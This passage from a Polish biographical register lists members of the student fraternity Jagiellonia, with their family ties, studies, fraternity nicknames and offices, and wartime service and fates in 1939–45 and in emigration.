 56. Juliusz Grodzicki-Łada, ( - 17 listopada 1981) s. Mariana i Stanisławy z Marynowskich, student UW, c. 1930/31, i.p. “Czaruś”, akt. 1931-32, w wojnie obronnej 1939 w 6 Motorowym Batalionie Artylerii Przeciwlotniczej, w 1940 w Ośrodku Wyszkolenia Artylerii Przeciwlotnizej we Francji, następnie w w Centrum Wyszkolenia Artylerii Przeciwlotniczej w Anglii, 1943-47 członek prezydium, 1947-48 II wiceprezes “P.A.K. Jagiellonia na Obczyźnie”, po wojnie na emigracji w Wielkiej Brytanii

 57. Kazimierz Gutkowski, (24 sierpnia 1904 - 22 lutego 1944 w Treblince) herbu Rawicz, s. Kazimierza Marcelego i Wandy z Myszkiewiczów, c. 1922/23, i.p. “Longin”, akt. 1922/23-25, zamorodwany w obozie koncentracyjnym
 58. Stanisław Gutowski, (1911 - 2006/07) student UW, c. 1929, i.p. “Serpentyna”, akt. 1929-32, absolwent UW, prawnik, w wojnie obronnej 1939 w 9 Dywizjonie Artylerii Konnej, w czasie okupacji w Komendzie i Wydziale VI -Dywersja NSZ, po wojnie na emigracji w Belgii
 59. Cezary A. Haller, (1915 - 11 grudnia 1971 w Kanadzie) s. Cezarego Wojciecha i Magdaleny Marii z Łęskich, bratanek Józefa (Baltia, Sparta), brat stryjeczny Eryka (Kujawja, Corona), c. 1935/36, akt. 1935/36-39, więzień oflagu IV c w Colditz oraz II a w Prenzlau, w wojnie obronnej 1939 w 23 Pułku Ułanów, po wojnie na emigracji w Kanadzie
 60. Wacław Henisz, (1890-1923) założyciel Jagiellonii, miecznik sem. zim. (?) 1910/11,
 61. Wiktor Henoch, ( - 2 lipca 1993) student WSH, c. 1928/29, i.p. “Eunuch”, akt. 1929-32, żołnierz kampanii wrześniowej 1939 w 2-gim Pułku Ułanów, w kampanii francuskiej 1940 w II Dywizji Strzelców Pieszych, później w pracy agenturalnej ww Francji “Ekspozytura F2″ ps. “Mar”, aresztowany i osadzony w obozie koncentracyjnym, po wojnie na emigracji we Francji, odznaczony Krzyżem Walecznych
 62. Jan Higersberger, (1905? - 3 września 1986) s. Stefana, bratanek Romana (obaj Arkonia, Welecja) brat Zbigniewa, kuzyn Tadeusza (obaj Jagiellonia), student SGGW, c. 1926/27, i.p. “Pomidor”, akt. 1926/27-32
 63. Tadeusz Higersberger, (16 październik 1906 w maj. Skrzany pow. Gostynin - 23 września 1939 pod Krynicami) s. Tomasza i Janiny z Owidzkich, bratanek Stefana i Romana (obaj Arkonia, Welecja), kuzyn Jana i Zbigniewa (obaj Jagiellonia), student Konerwatorium Warszawskiego, a następnie SGGW 1929-34, c. 1929/30, akt. 1929/30-32, ppor. rez. 145 pułku piechoty, żołnierz wojny obronnej 1939, poległ pod Krynicami, pochowany w mogile żołnierskiej na cmentarzu w Krynicach
 64. Zbigniew Higersberger, ( - 14 maja 1946 w Morpeth w Anglii) s. Stefana, bratanek Romana (obaj Arkonia, Welecja), brat Jana, kuzyn Tadeusza (obaj Jagiellonia), student PW, c. 1927/28, i.p. “Hiks”, akt. 1927/28-32, wiceprezes zewn. 1931/32, uczestnik wojny obronnej 1939, w Ośrodku Wyszkolenia Artylerii Przeciwlotnizej we Francji 1940, następnie w w Centrum Wyszkolenia Artylerii Przeciwlotniczej w Anglii
 65. Jerzy Hoffman, (1918 - 11 lutego 1998 w Sydney w Australii) c. 1937, i.p. “Picocolo”, c. 1937-39, absolwent SGGW, w czasie okupacji w AK, więzień oflagu X B Nienburg, po wojnie na emigracji w Australii, pochowany w Sidney

  Ludwik Szulc-Holnicki, 1932/33 r.

 66. Ludwik Szulc-Holnicki, (1910 - 16 sierpnia 1975) student SGGW, c. 1930/31, i.p. “Lupek”, akt. 1930/31-38, w wojnie obronnej 1939 w 3 Pułku Strzelców Konnych, więzień oflagu, odznaczony Virtuti Militarii, pochowany na warszawskich Powązkach

 67. Tytus bar. Horoch, (26 września 1919 w miejsc. Boksyce -19 stycznia 1945 w miejsc. Przysucha) herbu Trąby, s. Zdzisława Feliksa i Emilii z Jasieńskich, c. 1938/39, j.p. “Generalissimus”, zginął w zbombardowanym pociągu ewakuacyjnym
 68. Jerzy Horodyski, ( - 1939 k. Garwolina) student WSH, c. 1927/28, i.p. “Rybignat”, akt. 1927/28-32, oficer rez. WP, zmobilizowany w 1939, poległ w kampanii wrześniowej
 69. Władysław Sas-Hubicki, członek Jagiellonii w Wiedniu, i.p. “Grzela”, członek POW, w 24 pułku art. piechoty w wojnie 1918-20,
 70. Władysław Iwanicki, student SGGW, c. 1930/31, skreślony [być może Władysław Iwanciki (15 sierpnia 1911 - 26 września 1939 w Warszawie) herbu Pełnia, s. Jerzego i Wandy z d. Breza, pochowany w Młodzieszynie]
 71. Eugeniusz Iwanowicz, członek Jagiellonii w Wiedniu, w 11 pułku art. piechoty w wojnie 1918-20,
 72. Emil Maria Janiszewski, w 10 pułku strzelców granicznych w wojnie 1918-20, ranny w walkach, student UW, student WSH 1928, c. 1924/25, i.p. “Kusy”, akt. 1924/25-30, sekretarz Koła Starych Strzech (Filistrów) 1939, w dowództwie II Korpusu PSZ, po wojnie na emigracji w Norwegii i Wielkiej Brytanii

  Stanisław Janiszkiewicz, 1932/33 r.

 73. Stanisław Janiszkiewicz, (1912 we Włocławku - 23 października 1971) c. 1932/33, i.p. “Żuk”, oficer rez., w wojnie obronnej 1939 w 15 Baonie Saperów w 15 Wielkopolskiej Dywizji Piechoty w ramach Armii “Pomorze”, jeniec Stalagu VI C, pochowany na warszawskich Powązkach

 74. Jan Jaraczewski, (26 grudnia 1909 w Warszawie - 12 czerwca 1972 w Poznaniu) s. Antoniego i Heleny z d. Zaborska, brat Wojciecha (Jagiellonia), absolwent Gimnazjum im. Stefana Batorego w Warszawie, student i absolwent WSH, c. 1930/31, i.p. “Łysek”, akt. 1930/31-39, oficer rez., w kampanii wrześniowej w 14 Dywizjonie Artylerii Konnej (DAK) na Wołyniu, obrońca twierdzy Modlin, w czasie okupacji w AK w 1 Pułku Strzelców Konnych (Dyon 1806 “Zagrobla”), po wojnie reprezentant handlowo-techniczny, pochowany na warszawskich Powązkach

  Wojciech Jaraczewski.

 75. Wojciech Jaraczewski, (16 kwietnia 1915 - 26 października 1943 w Warszawie) syn Antoniego i Heleny z d. Zaborska, brat Jana (Jagiellonia), absolwent Gimnazjum im. Stefana Batorego w Warszawie, c. 1934/35, i.p. “Oleina”, akt. 1934/35-39, zamordowany przez Gestapo

 76. Stanisław Jezierski, ( - 1964) członek Jagiellonii w Wiedniu, w wojnie 1918-20 w piechocie

  Jerzy Jeżewski, 1932 r.

 77. Jerzy Jeżewski, (26 czerwca 1910 w Warszawie - 12 maja 1993 w Cordobie w Argentynie) s. Hilarego Jana i Jadwigi z d. Hertz, absolwent Gimnazjum im. Adama Mickiewicza, student i absolwent prawa UW, c. 1930/31, i.p. “Fyłek”, akt. 1930/31-32, po studiach pracownik Kancelarii Adwokackiej Bittner, działu prawnego PKP oraz działu prawnego Syndykatu Dziennikarzy, w wojnie obronnej 1939 w 11 Dywizjonie Artylerii Przeciwlotniczej, przez Węgry i Jugosławię przeostał się do Francji, w Ośrodku Wyszkolenia Artylerii Przeciwlotnizej we Francji 1940, później w 3 Dywizji Strzelców Karpackich oraz w 2 Korpusie gen. Władysława Andersa, m.in. pod Monte Cassino, prawnik, po wojnie od 1948 na emigracji w Argentynie, urzędnik ministerstwa marynarki na Ziemi Ognistej oraz pracownik włoskiej firmy SCAC w Cordobie, pochowany na Cmentarzu Santa Ines w Villa Alende w Cordobie

  Zygmunt Jeżewski, 1936 r.

 78. Zygmunt Jeżewski, (1915 - 30 stycznia 2005) c. 1933, akt. 1933-38, absolwent SGGW, w czasie wojny w administracji majątków Jeżówka, Szczeglin, jako kierownik budowy wału wiślanego na odcinku Połaniec-Nowy Korczyn, po wojnie w Ministerstwie Przemysłu 1945-46, w Państwowych Nieruchomościach Rolnych 1946-48, od 1948-71 w produkcji wikliny, m.in. w przedsiębiorstwie “Polska Wiklina”, jako Główny Inspektor Plantacji Wikliny, organizator m.in. Stacji Doświadczalnej Uprawy Wikliny w Brzegu nad Odrą 1949 i Zespołu Badawczego Uprawy i Przetwórstwa Wikliny przy Przedsiębiorstwie “Las” Oddział Białystok 1968, prowadził badania nad wikliną, autor 49 publikacji z tego zakresu (w tym dwa podręczniki), od 1971 starszy ekonomista w Zakładzie Planowania i Rozmieszczanie Produkcji Rolnej, doktor nauk rolniczych SGGW 1976, autor wspomnień “Mój marsz przez życie” (Komorów 2004), pochowany na Cmentarzu w Komorowie

 79. Jan Jurjewicz, ( - 5 października 1990) c. 1934/35, i.p. “Gęsi Ogier”, akt. 1934/35-39, w czasie wojny w 304 Dywizjonie Bombowym Morskim, po wojnie na emigracji w Indiach i Brazylii, odznaczony trzykrotnie Krzyżem Walecznych
 80. Stefan Jurzyński, ( - 25 sierpnia 1966 w Wielkiej Brytanii) założyciel Jagiellonii, i.p. “Pinczer”, po wojnie na emigracji w Wielkiej Brytanii
 81. Józef Kaczorowski, student UW, c. 1928, akt. 1928-29, wystąpił
 82. Antoni Kamiński, (13 czerwca 1908 w Warszawie - 24 marca 1981 w Warszawie) brat Jana (Jagiellonia), student UW, student WSH (1930), c. 1927/28, i.p. “Lancuś”, akt. 1927/28-32, wiceprezes zewn. 1929/30, oficer rez., w wojnie obronnej 1939 w 2 Pułku Ułanów Grochowskich, w czasie okupacji w AK, pracownik firm “Pluton”, “Lawina”, “Płudy”, “Desa”, “Cepelia” i miesięcznika “Polska”, odznaczony Krzyżem Walecznych, Krzyżem Kawalerskim OOP, pochowany na warszawskich Powązkach
 83. Jan Bronisław Kamiński, (28 marca 1900 w Warszawie - 17 lutego 1971 w Szczecinie) brat Antoniego (Jagiellonia), w 2 Pułku Ułanów Grochowskich w wojnie 1918-20, c. 1920/21, i.p. “Picuś”, rolnik, pochowany w Szczecinie
 84. Adam Karnkowski, (1907 - 24 czerwca 1983) herbu Junosza, s. Piotra i Czesławy z d. Karnkowska, student WSH, c. 1928, i.p. “Śliwa”, akt. 1928-32, żołnierz wojny obronnej 1939
 85. Tadeusz Kisiel-Kiślański, ( - 1940 w Gratz) w 203 pułku ułanów w wojnie 1918-20, c. 1920/21 i.p., akt. 1921-25, w czasie okupcji w wywiadzie przemysłowym Komendy Głównej AK, aresztowany przez Gestapo, zesłany do obozu koncentracyjnego Graz, tam zamordowany, odznaczony Virtuti Militari

  Stanisław Kisiel, 1975 r.

 86. Stanisław Kisiel-Światołdycz, (26 listopada 1906 w Warszawie - 3 lutego 1983 w Londynie) student UW, c. 1926/27, i.p. “Kufel”, akt. 1926/27-32, sekretarz 1927/28, wiceprezes zewn. 1928/29, prezes 1930/31, inż. chemii UW, kap. rez. łączności, w wojnie obronnej 1939 w 5 Baonie Telegraficznym, w 1940 w Ośrodku Ofic. Łączności we Francji, następnie w Baonie Łączności Sztabu Naczelnego Wodza w Anglii, od 1948 kurator “P.K.A. Jagiellonia na Obczyźnie”, wieloletni wydawca Biuletynów Jagiellonii na obczyźnie

 87. Karol Kleitz, student UW, c. 1927
 88. Zbigniew Kleniewski, c. 1938/39, wystąpił [prawd. Zbigniew Kleniewski (1918 - ), herbu Zagłoba, s. Przemysława i Wandy z d. Pfeiffer]
 89. Michał Kłobukowski, (1911 - 11 kwietnia 2004) student UW i Uniwersytetu w Zurichu, c. 1931, i.p. “Kubuś”, akt. 1931-32, mgr praw, oficer zawodowy, kapitan (audytor), uczestnik wojny obronnej 1939 (w sądzie wojskowym), w kampanii francuskiej 1940 w II Dywizji Strzelców Pieszych (sąd polowy), jako żołnierz Dywizji Strzelców w kampanii francuskiej 1940, sędzia, po wojnie na emigracji w Maroku i Francji
 90. Włodzimierz Tadeusz Kłobukowski, (1892 - 1968) herbu Oksza, członek Jagiellonii w Wiedniu,w piechocie 2-iej Brygady Legionów, w wojnie 1918-20 adiutant ministra ds. wojskowych, oficer zawodowy, mjr piechoty, ranny w zamachu stanu 1926, naczelnik Izby Skarbowej w Łodzi, pochowany na warszawskich Powązkach, odznaczony czterokrotnie Krzyżem Walecznych

  Aleksander Kobusiewicz, 1932/33 r.

 91. Aleksander Kobusiewicz, (27 sierpnia 1910 w Osinach pow. Łask - 1940 w Katyniu) s. Zenona i Marii z Przedpełskich, brat Stanisława (Jagiellonia), student i absolwent SGGW, c. 1932, akt. 1932, od 1937 administrował maj. Dusosciny k. Piotrkowa, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, ppor. rez., przydzielony do 1 Pułku Szwoleżerów, w wojnie obronnej 1939 zwiadowca konny w 1 Pułku Szwoleżerów, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD

  Stanisław Kobusiewicz, lata 30-te.

 92. Stanisław Kobusiewicz, (6 grudnia 1914 w Osinach pow. Łask - 5 marca 1985 w Katowicach) s. Zenona i Marii z Przedpełskich, brat Aleksandra (Jagiellonia), absolwent Gimnazjum w Włocławku, student i absolwent SGH, c. 1933/34, akt. 1933/34-39, w czasie okupacji w Lublinie, po wojnie ukończył ekonomię przemysłu na Akademii Ekonomicznej w Katowicach, pracował w banku, a następnie jako generlany wykonawca w Przedsiębiorstwie Budowlanym Przemysłu Węglowego w Katowicach, pochowany na Cmentarzu Parafialnym przy ul. Sienkiewicza w Katowicach

 93. Bronisław Kobylański, członek Jagiellonii w Wiedniu, po pierwszej wojnie jeden z dyrektorów firmy Gerlach
 94. Jerzy Kokowski, ( - 1914-18) członek Jagiellonii w Wiedniu, i.p. “Kokos”, żołnierz 2 pułku ułanów Legionów, poległ w I wojnie światowej, odznaczony Virtuti Militari
 95. Jan Korzybski, (14 maja 1910 w miejsc. Wilczyska -20 sierpnia 1944 w Warszawie) herbu Awdaniec, s. Jana i Celiny z d. Chwalibóg, c. 1934/35, i.p. “Wypłosz”, akt. 1934/35-39, wiceprezes sem. zim. 1938/39, w wojnie obronnej 1939 w 1 Pułku Strzelców Konnych, w czasie okupacji w AK ps. “Irma” w 1 Pułku Strzelców Konnych (Dyon 1806 “Zagrobla”), poległ w powstaniu warszawskim na barykadzie przy ul. Bielańskiej w baonie im. Łukasińskiego w zgrupowaniu “Gozdawa”, odznaczony Virtuti Militari
 96. Franciszek Koy, ( - 1919/20) członek Jagiellonii w Wiedniu, i.p. “Zameczek” (?) żołnierz 2 pułku ułanów Legionów, w żandarmerii w wojnie 1918-19, zginął na froncie bolszewickim, odznaczony Virtuti Militari
 97. Tadeusz Kowalski, ( - przed 1935) c. 1922/23, akt. 1922/23
 98. Michał Kowalewski, (8 sierpnia 1908 w Gostyninie - 1940 w Katyniu) s. Bogdana i Emilii z Malczewskich, student i absolwent prawa UW, c. 1928/29, akt. 1929, sędzia, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1932, ppor. rez., przydzielony do 42 Dywizjonu Artylerii Lekkiej, w niewoli sowieckiej w Kozielsku, zamordowany przez NKWD
 99. Leon Kozłowski, (1899 - 8 czerwca 1977) ziemianin, herbu własnego, s. Adama i Leontyny z d. Jewdokimow-Szujska, w 3 pułku ułanów w wojnie 1918-20, absolwent SGGW 1925, c. 1922/23, w 1928 został właścicielem zamku w Janowcu i 19 ha resztówki dawnego maj. Ćwirko-Godyckich, n a początku lat 30-tych założył tarasową winnicę u podnóży janowieckiego zamku
 100. Andrzej Bobola Marek hr. Krasiński (Karwin-Krasiński), (25 kwietnia 1916 w Krakowie - 31 października 1997 w Warszawie) pochodził z Bojar pod Grodnem, student SGGW, c. 1935/36, i.p. “Kangur”, akt. 1935/36-39, sekretarz sem. zim. 1937/38, rolnik, w czasie okupacji w AK, dowódca oddziału, po wojnie pracownik “Pax” i “Więzi”
 101. Andrzej Krąkowski, ( - 27 maja 1991) c. 1934/35, i.p. “Bobodryp”, akt. 1934/35-39, wiceprezes sem. zim. 1937/38, prezes sem. zim. 1938/39, w wojnie obronnej 1939 w 1 Pułku Artylerii Ciężkiej (?), w kampanii francuskiej 1940 w I Pułku Arylerii Lekkiej 1 Dywizji Grenadierów, przeszedł granicę szwajcarską, pod komendą brytyjską w 1945 r w 4 Pułku Pancernym 4 Dywizji Piechoty
 102. Tadeusz Krąkowski, ( - 5 grudnia 1975) członek Jagiellonii w Wiedniu, i.p. “Niuf”, w 2 pułku ułanów w wojnie 1918-20

  Rodryg Skarbek-Kruszewski, 1978 r.

 103. Rodryg Skarbek-Kruszewski, ( - 30 marca 1984) w wojnie 1918-20 w 1 pułku szwoleżerów, student UW, c. 1930, i.p. “Szarak”, akt. 1930-32, w wojnie obronnej 1939 w 3 Baonie Strzelców, w 1945 w 6 Pułku gospodarczo-rolniczym LWP

  Janusz Krzeczkowski, lata 30-te.

 104. Janusz Krzeczkowski, (ok. 1911 - 1 sierpnia 1944 w Warszawie) brat Tadeusza (Jagiellonia), absolwent Gimnazjum im. S. Staszica, student SGGW oraz w Darmastadt, c. 1932, akt. 1932-39, w wojnie obronnej 1939 w 11 Dywizjonie Artylerii Konnej Pomorskiej Brygady Kawalerii w ramach Armii “Pomorze”, w AK w Pułku “Garłuch”, poległ w ataku na lotnisko Okęcie w czasie powstania warszawskiego, pochowany na Wojskowych Powązkach w Warszawie

 105. Tadeusz Krzeczkowski, (ok. 1908 - 1940?) brat Janusza (Jagiellonia), student UW, c. 1925/26, akt. 1925/26-32, prawnik, adwokat, pchor. rez., w wojnie obronnej 1939 w 4 Pułku Ułanów, w niewoli sowieckiej, wg rodziny zginął prawd. w Katyniu
 106. Wojciech Krzymowski, ( - 1969) c. 1937/38, akt. 1937/38-39, w wojnie obronnej 1939 w 4 Pułku Strzelców Konnych, w czasie okupacji w AK

  Tadeusz Kugler.

 107. Tadeusz Kugler, (1 listopada 1908 w Mstyczowie - 25 października 1961 w Los Angeles) s. Bolesława i Heleny Domaszewskiej, brat stryjeczny Ludwika (Aquilonia), student WSH, c. 1930, i.p. “Kumpel”, akt. 1930-32, właściciel maj. Mstyczów pow. Jędrzejów, ppor. rez., żołnierz wojny obronnej 1939, w czasie okupacji w AK ps. “Marian” i “Andrzej” w 7 pułku piechoty (zgrup. part. “Marcina”), po wojnie na emigracji w Argentynie i Stanach Zjednoczonych

  Stanisław Kuhnke, lata 20-te.

 108. Stanisław Kuhnke, (1900 - 6 maja 1972) s. Wilhelma i Janiny Danieli z Babińskich, brat Tadeusza (Jagiellonia), c. 1921/22, i.p. “Kempa”, akt. 1921/22-25, prawnik, w czasie II wojny światowej w Delegatrzu Rządu w planowaniu rolnictwa, pochowany na warszawskich Powązkach

  Tadeusz Kuhnke, lata 20-te.

 109. Tadeusz Jan Kuhnke, (27 marca 1903 w Warszawie - 5 listopada 1964 w Warszawie) s. Wilhelma i Janiny Danieli z Babińskich, brat Stanisława (Jagiellonia), absolwent Gimnazjum im. S. Staszica w Warszawie 1922, student i absolwent 1931 Wydziału Inżynierii Lądowej PW, c. 1922/23, i.p. “Żłobek”, akt. 1922/23-30, wiceprezes sem. let. 1927/28, po studiach zastępca kierownika robót, a nastepnie kierownik robót w Firmie “F. Skąpski i S-ka” w Warszawie, wykonywał wolny zawód jako konstuktor 1934-35, pracownik Towarzystwa Przemysłu Metalowego 1935-48, w tym kierownik robót 1935-39, kierownik wydziału budowlanego 1939-46, dyrektor techniczny 1946-48, w okresie okupacji w konspiracyjnej tajnej akcji apołecznej prowadzonej przez Koło Inżynierów Dróg i Mostów w Warszawie, później wicedyrektor techniczy IV Oddziłu Inżynieryjengo Państwowego Przedsiębiorstwa “Beton-Stal” w Warszawie 1948-50, pracownik Zarządu Budowy Metra oraz Zjednoczenia Metrobudowa Warszawa, w tym zastępca i przewodniczący Rady Technicznej Metrobudowy 1952-57, sekretarz naukowy Techniczo-Ekonomicznej Rady Naukowej przy Prezydium Stołecznej Rady Narodowej w Warszawie 1958-64, autor wielu projektów budów i ich wykonawca, autor publikacji w “Przeglądzie Budowlanym”, “Przeglądzie Technicznym” i “Stolicy”, działacz organizacji zawodowych, w tym Związku Inżynierów i Techników Budownictwa oraz Koła Inżynierów Dróg i Mostów, pochowny na warszawskich Powązkach (kwatera X) [zob. Edmund Hera, Kuhnke Tadeusz Jan (1903-1964), (w:) PSB, t. 16, s. 111]

 110. Stanisław Kula, członek Jagiellonii w Wiedniu, wystąpił przed 1935
 111. Jan Kunicki, ( - przed 1935) założyciel Jagiellonii, prezes sem. zim. 1911/12, pierwszy prezes w Warszawie sem. zim. 1920/21
 112. Tadeusz Lambert, członek Jagiellonii w Wiedniu, wystąpił przed 1935
 113. Kazimierz Grzegorz Lauber (Lauber von Krey), (4 marca 1913 w maj. Rodowym Dworaliszki k. Marianpola na Litwie - 3 grudnia 1944 w Brwinowie) syn Mariusza i Wandy z Zambrzyckich, c. 1933/34, i.p. “Sabadilla”, akt. 1933/34-39, ranny w powstaniu warszawskim, zmarł na gruźlicę, pochowany na Cmentarzu w Brwinowie
 114. Bohdan Lenkiewicz, (12 listopada 1908 w Wilnie - 1940 w Charkowie) s. Lubomira i Anieli, student i absolwent prawa UW, c. 1927/28, i.p. “Indycze Jajo”, akt. 1927/28-30, absolwent Szkoły Podchorążych Rezerwy Artylerii 1932, ppor. rez., przydzielony do 9 Dywizjonu Artylerii Przeciwlotniczej, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 115. Olgierd Lenkiewicz, (12 listopada 1908 w Wilnie - 1940 w Charkowie) s. Lubomira, student UW, c. 1927/28, i.p. “Indycze Jajo”, akt. 1927/28-30, mgr prawa, ppor., w wojnie obronnej w 9 Dywizjonie Artylerii Przeciwlotniczej, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD
 116. Marian Liberak, ( - przed 1935) członek Jagiellonii w Wiedniu, w 1 pułku art. górskiej w wojnie 1918-20,

  Konrad Janusz Lipczyński, 1939 r.

 117. Konrad Janusz Lipczyński, (1919-2001) c. 1936, i.p. “Szpiczak”, akt. 1936-39, absolwent SGH, ekonomista, w wojnie obronnej 1939 w 19 Pułku Ułanów

 118. Mieczysław Lipczyński, ( - 1944 w Warszawie) c. 1932/33, i.p. “Kapsel”, akt. 1932/33-39, w wojnie obronnej 1939 w 12 Pułku Ułanów, rozstrzelany przez Niemców na Woli podczas powstania warszawskiego
 119. Stefan Tadeusz Lipiński, ( - 1963) student UW, c. 1924/25, i.p. “Pipka”, akt. 1924/25-29, sekretarz 1925/26, prezes 1928/29
 120. Marian Lorencki, ( - przed 1935) członek Jagiellonii w Wiedniu

  Tadeusz Loth, po 1945 r.

 121. Tadeusz Loth, (1 lipca 1911 w Warszawie - 9 maja 1986 w Warszawie) s. Alfeda (Jagiellonia) i Jadwigi Julii z d. Żukowskiej, absolwent Gimnazjum Ziemi Mazowieckiej w Warszawie, student i absolwent 1936 Wydziału Rolnego SGGW, c. 1929, i.p. “Ciapek”, akt. 1929-32, wiceprezes wewn. 1931/32, wiceprezes zewn. 1932/33, wiceprezes wewn. ZPKA 1932-33 (XII kadencja), absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu, w wojnie obronnej 1939 w 2 Pułku Ułanów Grochowskich, w czasie okupacji w AK w 1 Pułku Strzelców Konnych (Dyon 1806 “Zagrobla”), założyciel i długoletni prezes Spółdzielni “Okęcie”, członek i wieloletni prezes Koła Łowieckiego “Ratusz”, odznaczony Krzyżem Walecznych

 122. Jerzy Lutostański, (11 stycznia 1918 w Nieborzynie - 19 września 1939 k. Sierakowa) herbu Jelita, s. Wacława i Marii z Dąmbskich, brat Władysława (Corona), c. 1938/39, i.p. “Matematyk”, pchor. rez., w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskich Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, poległ między Sierakowem a Laskami, odznaczony Virtuti Militari
 123. Kazimierz Łacic, c. 1923/24, akt. 1923/24-25
 124. Aleksander Łubieński, (6 sierpnia 1894 w Warszawie - po 1945) z Łubnej herbu Pomian, s. Władysława i Leonii Goldstand, członek Jagiellonii w Wiedniu, wystąpił przed 1935, mjr WP, dyplomata, dyrektor Protokołu Dyplomatycznego MSZ, po wojnie na emigracji w Wielkiej Brytanii

  Kazimierz Makomaski, lata 20-te.

 125. Kazimierz Makomaski, (2 października 1902 w majątku rodzinnym w Strzałkowie pow. Mława - 1978 w Warszawie) kuzyn Tadeusza (Jagiellonia), kuzyn Włodzimierza (Sarmatia), c. 1923/24, absolwent Wydziału Rolnego SGGW w Warszawie, inż. rolnik, po studiach pracował na Giełdzie Mięsnej w Warszawie, wczasie okupacji prowadził gospodarstwo rolne w okolicach Mławy, a po jego parcelacji w 1945 w Olsztynie, pracował do emerytury w Centrali Spółdzielni Ogrodniczych, odznaczony srebrną oznaką honorową za Zasługi dla Warmii i Mazur

 126. Tadeusz Makomaski, ( - 8 listopada 1976) kuzyn Kazimierza (Jagiellonia) i Włodzimierza (Sarmatia), w 4 pułku ułanów w wojnie 1918-20, uczestnik III powstania śląskiego, c. 1923/24, i.p. “Bdyla”, w kampanii francuskiej 1940 w III Dywizji Piechoty, następnie w 10 Pułku Strzelców Konnych w Anglii, po wojnie na emigracji w Australii
 127. Jerzy Dunin-Markiewicz, (27 września 1900 w Kielcach - 1 stycznia 1965 w Moulent Rocher pod Paryżem) w 3 Pułku Ułanów w wojnie 1918-20, student w Warszawie, c. 1921/22 Jagiellonia, i.p. “Kakadu”, akt. 1921/22-28, student i absolwent Wydziału Górniczego AG 1923-30, po przeniesieniu na studia do Krakowa pomagał organizować Gnomię, członek Gnomii, po studiach pracował w kopalni “Kazimierz - Juliusz” w Strzemieszycach, uczestnik wojny obronnej 1939, w kampanii francuskiej 1940 w Dywizji Grenadierów, w niewoli niemieckiej w oflagu XIII i XVII A Edelbach, po wojnie na emigracji we Francji, dyrektor techniczny kopalni manganu Société Miniere d’Agadir w Casablance 1948-55 oraz kopalni “Hasbaya” w Libanie 1956-58, dyrektor Société Tarbaise d’Industrie Chmique we Francji 1959-62, odznaczony dwukrotnie Krzyżem Walecznych

  Tadeusz Markiewicz, 1975 r.

 128. Tadeusz Dunin-Markiewicz, (1899 - 30 stycznia 1995 w Londynie) w 1 i 3 dywizjonie art. konnej w wojnie 1918-20, c. 1922, i.p. “Syfon”, akt. 1922-25, prezes 1925/26, inż. mechanik, w czasie wojny w Centrum Wyszkolenia Broni Pancernych w Anglii, po wojnie na emigracji w Wielkiej Brytanii, 1983-95 wydawca Biuletynów Jagiellonii na obczyźnie

 129. Henryk Martens, (1904 w Warszawie - 4 marca 1977 w Sopocie) s. Henryka i Amelii z d. Jung, w wojnie 1918-20 w piechocie, student Wydziału Inżynierii Lądowej PW, c. 1923/24, i.p. “Kiełbik”, akt. 1923/24-30, w czasie okupacji w AK, uczestnik powstania warszawskiego, po wojnie mieszkał w Sopocie, prezes firmy budowlanej Martens-Daab, pochowany na Cmentarzu Ewangelickim w Warszawie
 130. Alfred Matuszewski, ( - przed 1935) członek Jagiellonii w Wiedniu, i.p. “Roch Kowalski”
 131. Leopold Mertz, wystąpił przed 1935
 132. Gustaw Michaelis, c. 1922/23, akt. 1922/23-25, później skreślony
 133. Zbigniew Mieszczański, (18 paźdizernika 1900 - 23 maja 1954) herbu Łabędź, s. Antoniego i Anieli z d. Rogalska, brat stryjeczny Zbigniewa (Jagiellonia), w 3 pułku ułanów w wojnie 1918-20, c. 1921/22
 134. Władysław Mieszkowski, ( - 1962) c. 1920/21, akt. 1920/21-24, wiceprezes wewnętrzny ZPKA 1923-24 (II kadencja)
 135. Adam Mniszek, ( - 16 listopada 1957 w Anglii) założyciel Jagiellonii, żołnierz 2 pułku ułanów Legionów, w wojnie 1918-20 w Naczelnym Dowództwie, zawodowy oficer, płk. dypl., kawalerzysta, uczestnik wojny obronnej 1939 (Kwatera Główna Naczelnego Wodza), kampanii francuskiej 1940 (Stacja Zborna Camp de Carpiagne), PSZ w Wielkiej Brytanii (Sztab Naczelnego Wodza), po wojnie na emigracji w Wielkiej Brytanii, odznaczony trzykrotnie Krzyżem Walecznych
 136. Stanisław Moszyński ( - po 1943), członek Jagiellonii w Wiedniu, żołnierz 2 pułku ułanów Legionów, w wojnie 1918-20 w 2 pułku szwoleżerów, odznaczony Virtuti Militari
 137. Tadeusz Nałęcz-Mrozowski, ( - 24 czerwca 1963 w Stanach Zjednoczonych) student PL Lwów 1927, c. 1924/25, i.p. “Fajtuś”, akt. 1924/25-28, w czasie wojny w wojsku w obsadzie lotnisk Farnborough i Busgfield, 1943-47 i 1947-48 prezes “P.A.K. Jagiellonia na Obczyźnie”, po wojnie na emigracji w Stanach Zjednoczonych
 138. Julian Myszkowski (junior), ( - 1939-45), c. 1937/38, akt. 1937/38-39, w wojnie obronnej 1939 w kawalerii dywizyjnej 8 Dywizji Piechoty, więzień stalagu I B Hohenstein oraz VI G Bonn Duisdorf
 139. Julian Myszkowski (senior), ( - 1940 w Mauthausen) prezes sem. let. 1912/13 oraz sem. let. 1913/14, zamordowany w obozie koncentracyjnym
 140. Henryk Nowakowski, c. 1938/39
 141. Ludwik Nowakowski, ( - 1943 w Auschwitz) c. 1933/34, ip. “Strażak”, akt. 1933/34-39, w wojnie obronnej 1939 w 2 Dywizjonie Artylerii Konnej, w czasie okupacji w AK, zamordowany w niemieckim obozie koncentracyjnym
 142. Michał Obidziński, ( - 1947 ?) student PW, student UW (1931), w 4 pułku ułanów w wojnie 1918-20, student PW, c. 1922/23, i.p. “Kita”, akt. 1922/23-32, prezes 1927/28
 143. Kazimierz Ogrodziński, c. 1910, wiceprezes sem. zim. (?) 1910/11,
